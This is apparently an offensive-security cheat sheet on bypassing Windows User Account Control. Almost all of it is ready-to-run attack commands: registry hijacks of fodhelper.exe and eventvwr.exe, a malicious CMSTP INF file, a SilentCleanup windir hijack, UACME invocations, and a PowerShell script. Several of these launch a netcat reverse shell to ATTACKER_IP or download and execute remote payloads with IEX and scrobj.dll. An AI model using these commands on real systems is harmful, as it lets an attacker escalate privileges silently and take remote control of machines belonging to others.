Skip to main content

Overview

UAC (User Account Control) prompts for elevation. If the user is in the local Administrators group but running in a medium-integrity context, UAC bypass escalates to high integrity without the prompt.

Check UAC Status

reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin
ConsentPromptBehaviorAdminMeaning
0Elevate without prompting
1Prompt for credentials on the secure desktop
2Prompt for consent on the secure desktop
4Prompt for consent
5Default — prompt for consent for non-Windows binaries

Check Current Integrity Level

whoami /groups | findstr "Label"
LabelLevel
Medium Mandatory LevelStandard — UAC bypass needed
High Mandatory LevelAlready elevated

fodhelper.exe

Auto-elevates. Reads a registry key we can control.
reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /d "C:\Windows\Temp\nc.exe -e cmd.exe ATTACKER_IP 4444" /f
reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ /f
fodhelper.exe
Cleanup:
reg delete HKCU\Software\Classes\ms-settings\Shell\Open\command /f

eventvwr.exe

Similar to fodhelper — abuses mmc.exe auto-elevation.
reg add HKCU\Software\Classes\mscfile\Shell\Open\command /d "C:\Windows\Temp\nc.exe -e cmd.exe ATTACKER_IP 4444" /f
eventvwr.exe
Cleanup:
reg delete HKCU\Software\Classes\mscfile\Shell\Open\command /f

CMSTP.exe

Connection Manager Profile Installer. Loads INF file that executes commands.

Create Malicious INF

[version]
Signature=$chicago$
AdvancedINF=2.5

[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection

[UnRegisterOCXSection]
%11%\scrobj.dll,NI,http://ATTACKER_IP/payload.sct

[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="Bypass"
ShortSvcName="Bypass"

Execute

cmstp.exe /ni /s malicious.inf

DiskCleanup (schtasks)

Environment variable windir hijack.
set windir=C:\Windows\Temp & schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
Place payload at:
C:\Windows\Temp\System32\cleanmgr.exe

UACME — Automated Bypass

Collection of 70+ UAC bypass methods.
https://github.com/hfiref0x/UACME

Usage

Akagi64.exe <method_number> "C:\Windows\Temp\nc.exe -e cmd.exe ATTACKER_IP 4444"
Common methods:
#TechniqueWorks on
23pkgmgrWindows 10
33fodhelperWindows 10/11
34DiskCleanupWindows 10
41CMSTPWindows 10
61slui / changepk registry hijackWindows 10/11
78SSPI datagramWindows 10/11

PowerShell Script (fodhelper)

New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value "powershell -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/shell.ps1')" -Force
Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden
UAC bypass only works if user is already in Administrators group. It escalates from medium to high integrity, not from standard user to admin.